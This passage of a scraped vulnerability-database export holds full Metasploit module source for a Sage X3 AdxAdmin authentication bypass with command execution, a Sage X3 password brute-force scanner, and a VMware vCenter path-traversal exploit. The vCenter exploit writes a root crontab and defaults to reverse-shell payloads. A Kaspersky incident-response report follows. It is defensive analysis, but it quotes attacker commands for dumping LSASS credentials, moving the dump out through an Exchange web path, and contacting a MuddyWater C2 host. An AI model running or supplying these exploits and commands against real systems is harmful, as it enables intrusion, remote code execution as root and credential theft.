retrieval of X3 directory\n auth_packet = \"\\x09\\x00\"\n s.write(auth_packet)\n\n # recv response\n res = s.read(1024)\n\n if res.nil? || res.length != 4\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n if res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"]\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n print_good('ADXDIR authentication successful.')\n\n # ADXDIR command\n adx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\"\n s.write(adx_dir_msg)\n directory = s.read(1024)\n\n return CheckCode::Safe if directory.nil?\n\n sagedir = directory[4..-2]\n print_good(format('Received directory info from host: %s', sagedir))\n disconnect\n\n CheckCode::Vulnerable(details: { sagedir: sagedir })\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def build_buffer(head, sage_payload, tail)\n buffer = ''\n\n # do things\n buffer << head if head\n buffer << sage_payload.length\n buffer << sage_payload\n buffer << tail if tail\n\n buffer\n end\n\n def write_file(sock, filenum, sage_payload, target, sagedir)\n s = sock\n\n # building the initial authentication packet\n # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]\n # Note: the first byte of this auth packet is different from the ADXDIR command\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n s.write(\"\\x06\\x00\")\n auth_resp = s.read(1024)\n\n fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4\n\n print_good('Command authentication successful.')\n\n # May require additional information such as file path\n # this will be used for multiple messages\n\n head = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head\n fmt = '@%s/tmp/cmd%s$cmd'\n fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'\n fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'\n pload = format(fmt, revsagedir, filenum)\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, pload, tail)\n s.write(sendbuf)\n s.read(1024)\n\n # Packet --- 3\n # Creating the packet that contains the command to run\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n\n # this writes the data to the .cmd file to get executed\n # a single write can't be larger than ~250 bytes\n # so writes larger than 250 need to be broken up\n written = 0\n print_status('Writing data')\n\n while written < sage_payload.length\n vprint('.')\n\n towrite = sage_payload[written..written + 250]\n sendbuf = build_buffer(head, towrite, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n written += towrite.length\n end\n\n vprint(\"\\r\\n\")\n end\n\n def exploit\n sage_payload = payload.encoded if target.name == 'Windows Command'\n sage_payload = generate_payload_dll if target.name == 'Windows DLL'\n sage_payload = generate_payload_exe if target.name == 'Windows Executable'\n\n sagedir = check.details[:sagedir]\n\n if sagedir.nil?\n fail_with(Failure::NotVulnerable,\n 'No directory was returned by the remote host, may not be vulnerable')\n end\n\n if sagedir.end_with?('AdxAdmin')\n register_dir_for_cleanup(\"#{sagedir}\\\\tmp\")\n end\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n filenum = rand_text_numeric(8)\n vprint_status(format('Using generated filename: %s', filenum))\n\n s = connect\n\n write_file(s, filenum, sage_payload, target.name, sagedir)\n\n unless target.name == 'Windows Command'\n disconnect\n # re-establish connection after writing file\n s = connect\n end\n\n if target.name == 'Windows DLL'\n sage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n if target.name == 'Windows Executable'\n sage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n # Some sort of delimiter\n delim0 = \"\\x02\\x00\\x01\\x01\" # bufm\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 4\n sage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\"\n head = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\"\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 5\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n sage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 6\n head = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\"\n sage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # if it's not COMMAND, we can stop here\n # otherwise, we'll send/recv the last bit\n # of info for the output\n unless target.name == 'Windows Command'\n disconnect\n return\n end\n\n # Packet --- Delim\n delim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\"\n s.write(delim1)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # The two below are directing the server to read from the .out file that should have been created\n # Then we get the output back\n # Packet --- 7 - Still works when removed.\n head = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 8\n head = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n s.write(delim1)\n returned_data = s.recv(8096).strip!\n\n if returned_data.nil? || returned_data.empty?\n disconnect\n fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')\n end\n\n print_good('------------ Response Received ------------')\n print_status(returned_data)\n disconnect\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-15T03:49:00", "description": "This module allows an attacker to perform a password guessing attack against the Sage X3 AdxAdmin service, which in turn can be used to authenticate to a local Windows account. This module implements the X3Crypt function to 'encrypt' any passwords to be used during the authentication process, given a plaintext password.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 AdxAdmin Login Scanner", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-09-02T15:57:38", "id": "MSF:AUXILIARY-SCANNER-SAGE-X3_ADXSRV_LOGIN-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/sage/x3_adxsrv_login/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/x3'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(_info = {})\n super(\n 'Name' => 'Sage X3 AdxAdmin Login Scanner',\n 'Description' => %q{\n This module allows an attacker to perform a password guessing attack against\n the Sage X3 AdxAdmin service, which in turn can be used to authenticate to\n a local Windows account.\n\n This module implements the X3Crypt function to 'encrypt' any passwords to\n be used during the authentication process, given a plaintext password.\n },\n 'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk\n 'License' => MSF_LICENSE,\n 'References' => [\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(1818),\n OptString.new('USERNAME', [false, 'User with which to authenticate to the AdxAdmin service', 'x3admin']),\n OptString.new('PASSWORD', [false, 'Plaintext password with which to authenticate', 's@ge2020'])\n ]\n )\n\n deregister_options('PASSWORD_SPRAY', 'BLANK_PASSWORDS')\n end\n\n def run_host(ip)\n cred_collection = build_credential_collection(\n blank_passwords: false,\n password: datastore['PASSWORD'],\n username: datastore['USERNAME']\n )\n\n scanner = Metasploit::Framework::LoginScanner::X3.new(\n host: ip,\n port: rport,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: fullname,\n workspace_id: myworkspace_id\n )\n\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(level: :good, ip: ip, msg: \"Success: '#{result.credential}'\")\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n next\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(level: :verror, ip: ip, msg: \"Could not connect: #{result.proof}\")\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(level: :verror, ip: ip, msg: \"Failed: '#{result.credential}'\")\n end\n\n invalidate_login(credential_data)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sage/x3_adxsrv_login.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2021-12-15T10:54:49", "description": "\n\n_Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a high-professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts complementing the automatic detection logic and letting us continuously improve the detection rules._\n\n_The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond._\n\n## PrintNightmare vulnerability exploitation\n\nThis summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: **CVE-2021-1675/CVE-2021-34527**, also known as [PrintNightmare](<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>). This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. We have already [published](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies.\n\n### Case #1\n\nShortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was disconnected several hours later, but during this time several other users managed to clone it.\n\nKaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed a request to suspicious _DLL_ libraries from the spooler service. It should be noted, that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. | C:\\Windows\\System32\\spool\\drivers\\x64\\3\\nightmare.dll C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\nightmare.dll \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | In addition, the following script was found on the host. | \\cve-2021-1675-main-powershell\\cve-2021-1675-main\\cve-2021-1675.ps1 \n \nThe table below contains signs of suspicious activity that served as a starting point for the investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1210:** \nExploitation of \nRemote \nServices | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\ \n1\\nightmare.dll \nFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate spoolsv.exe \nlocally modified \nc:\\windows\\system32 \n\\spool\\drivers\\x64\\ \n3\\old\\1\\nightmare.dll \n**T1588.005:** \nObtain \nCapabilities: \nExploits | AV exact detect in \nOnAccess mode | File: \n\\cve-2021-1675-main-powershell\\cve-2021- \n1675-main\\cve-2021-1675.ps1 \nAV verdicts: \nExploit.Win64.CVE-2021-1675.c; \nUDS:Exploit.Win64.CVE-2021-1675.c | CVE-2021-1675 exploit \nwas detected and \nsuccessfully deleted \nby AM engine \n \n### Case #2\n\nIn another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, _spooler_ service access to suspicious _DLL_ files was observed. In addition, the _spooler_ service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | MDR analyst detected the creation of suspicious _DLL_ libraries using the _certutil.exe_ tool on a monitored host. \nAfter that, the _spooler_ service was added to the planned tasks. | C:\\Windows\\System32\\spool\\driver \ns\\x64\\3\\new\\hello.dll \nC:\\Windows\\System32\\spool\\driver \ns\\x64\\3\\new\\unidrv.dll\u2026 \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Next, the spooler service called the newly created _DLL_ files. \nIn addition, the attacker ran some of the created libraries using the rundll32 component. | \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows [NTLM hashes](<https://book.hacktricks.xyz/windows/ntlm#basic-ntlm-domain-authentication-scheme>) to be intercepted. | \\REGISTRY\\MACHINE\\SYSTEM\\Control \nSet001\\Control\\Lsa\\MSV1_0 \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | Then the attacker re-added spooler to the planned tasks. \nAfter that, execution of various commands on the host with System privileges was observed. The source of this activity was _c:\\windows\\system32\\spoolsv.exe_ process | C:\\Windows\\System32\\cmd.exe /c \nnet start spooler \nC:\\Windows\\System32\\cmd.exe /c \ntimeout 600 &gt; NUL &amp;&amp; \nnet start spooler \n \nThe table below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1570: ** \nLateral Tool Transfer | Web AV exact detect in _OnDownload_ mode | AV verdict: HEUR:Trojan.Win32.Shelma.gen | Attacker downloads \nsuspicious DLL (that is, \nMeterpreter payload) via \nHTTP \n**T1140:** \nDeobfuscate/Decode Files or Information | Local File Modification | Process command lines: \ncertutil -decode 1.txt \nC:\\Share\\hello4.dll | Attacker used _certutil_ \nto decode text file into PE \nbinary \n**T1003.001: \n**OS Credential Dumping: LSASS Memory | AV exact detect in _OnAccess_ mode | AV verdicts: \nVHO:Trojan\u2011PSW.Win64.Mimikatz.gen \nTrojan-PSW.Win32.Mimikatz.gen | Attacker tried to use \nMimikatz \n**T1127.001: \n**Trusted Developer Utilities Proxy Execution: MSBuild | Outbound network connection | Process command line: \nC:\\Windows\\Microsoft.NET\\Framework\\v4 \n.0.30319\\MSBuild.exe C:\\Share\\1.xml | MSBuild network activity \n**T1210: \n**Exploitation of Remote Services | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64 \n\\3\\old\\1\\hello5.dllFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe locally \nmodified \nc:\\windows\\system3 \n2\\spool\\drivers\\x6 \n4\\3\\old\\1\\hello5.dll \n**T1547.012: \n**Boot or Logon Autostart Execution: Print Processors \n**T1033: \n**System Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\WINDOWS\\System32\\spoolsv.exe \nGrandparent process: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe started \nwhoami with System \nintegrity level \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors | Outbound network connection | Process command line: \nC:\\Windows\\System32\\spoolsv.exe \nRemote TCP port: 4444/TCP | Legitimate \nspoolsv.exe made a \nconnection to default \nMeterpreter port \n(4444/TCP) \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors \n**T1059.003:** \nCommand and Scripting Interpreter: Windows Command Shell \n**T1033:** \nSystem Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\Windows\\System32\\cmd.exe \nGrandparent process: \nC:\\Windows\\System32\\spoolsv.exe | Legitimate \nspoolsv.exe started \ncmd.exe that started \nwhoami with System \nintegrity level \n \n## MuddyWater attack\n\nIn this case, the Kaspersky MDR team detected a request from the customer's infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the [MuddyWater group](<https://attack.mitre.org/groups/G0069/>). MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky's report on this group's activity is available [here](<https://securelist.com/muddywaters-arsenal/90659/>).\n\nAmong other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is provided below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14152658/MDR_interesting_cases_06.png>) | First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host. | \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KLWB6.vbs \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group. | hxxp://185[.]117[.]73[.]52:443/getTarget \nInfo?guid=xxx-yyy-zzz&status=1 \nhxxp://185[.]117[.]73[.]52:443/getComman \nd?guid=xxx-yyy-zzz* \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14153224/MDR_interesting_cases_07.png>) | Next, execution of commands to collect information from the compromised host was observed. | "C:\\Windows\\System32\\cmd.exe" /c \nexplorer.exe >> \nc:\\ProgramData\\app_setting_readme.txt "C:\\Windows\\System32\\cmd.exe" /c whoami >> c:\\ProgramData\\app_setting_readme.txt \n \n**_* xxx is company short name (identifier), yyy is the victim hostname and zzz is username_**\n\nTable below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1071: \n**Application Layer Protocol | Access to malicious hosts from nonbrowsers | Target URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid \n=xxx-yyy-zzz&status=1 \nCMD line: \n"C:\\Windows\\System32\\WScript.exe" C:\\Users\\USERNAME\\AppData\\Roaming\\Microsoft\\Windo \nws\\Start Menu\\Programs\\Startup\\KLWB6.vbs \nProcess: \nC:\\Windows\\system32\\wscript.exe | VBS script accessed malicious URL during execution \n**T1071:** \nApplication Layer Protocol | URL exact detect | Malicious URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid \n=xxx-yyy-zzz&status=1 \nAV verdict: \nMalware | Malicious URL was successfully detected by AV \n \n## Credential Dumping from LSASS Memory\n\nIn the last case, we'd like to talk about an attack related to collecting credentials from the LSASS process memory dump (T1003.001 MITRE technique). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by System or administrative user and then used for attack development or lateral movement.\n\nMDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker's actions did not differ from the usual actions of the administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via Exchange server. In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID. | C:\\Windows\\System32\\tasklist.exe \nC:\\Windows\\System32\\findstr.exe /i sass \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution. | "C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump 616 \nc:\\programdata\\cdera.bin full\n\n_## 616 is LSASS process id_ \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154017/MDR_interesting_cases_08.png>) | Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the _resource.exe_ and _twindump.dll_ files. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -pKJERKL6j4dk&@1 c:\\programdata\\m.zip -o \nc:\\windows\\cluster\n\n## _resource.exe_ and _twindump.dll_ files were created \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Subsequently, the file _resource.exe_ was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful. | C:\\Windows\\System32\\cmd.exe /C \nC:\\Windows\\System32\\staskes.exe /create /tn Ecoh /tr \n"cmd /c C:\\Windows\\cluster\\resource.exe \nase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru \nsystem /F\n\n## staskes.exe is a renamed schtasks.exe file \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154042/MDR_interesting_cases_09.png>) | Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the [MirrorDump](<https://github.com/CCob/MirrorDump>) tool. As a result, the attacker successfully obtained an LSASS dump. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -p"KJERfK#L6j4dk321\u2033 \nc:\\programdata\\E.zip -o c:\\programdata\\ \nC:\\Windows\\System32\\cmd.exe \n/C c:\\windows\\system32\\staskes.exe /create /tn Ecoh /tr \n"c:\\programdata\\InEnglish.exe g2@j5js1 0sdfs,48 \nC:\\programdata\\EnglishEDouble \nC:\\programdata\\EnglishDDouble \nC:\\programdata\\English1.dll \nC:\\programdata\\English.dmp" /sc onstart /ru system /F C:\\Windows\\System32\\cmd.exe /C c:\\windows\\system32\\staskes.exe /run /tn Ecoh \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154059/MDR_interesting_cases_10.png>) | Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files. | C:\\Windows\\System32\\cmd.exe /C copy \nc:\\programdata\\Es.zip \nc:\\Program Files\\Microsoft\\Exchange Server\\V14\\ClientAccess\\owa\\auth\\Es.png \n \nTable below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | AV exact detect | AV verdict: \nPDM:Exploit.Win32.GenericProcess command line: \n"C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump \n**616** C:\\programdata\\cdera.bin full \nParent process command line: \nC:\\Windows\\System32\\wsmprovhost.exe - \nEmbedding \nGrandparent process command line:: 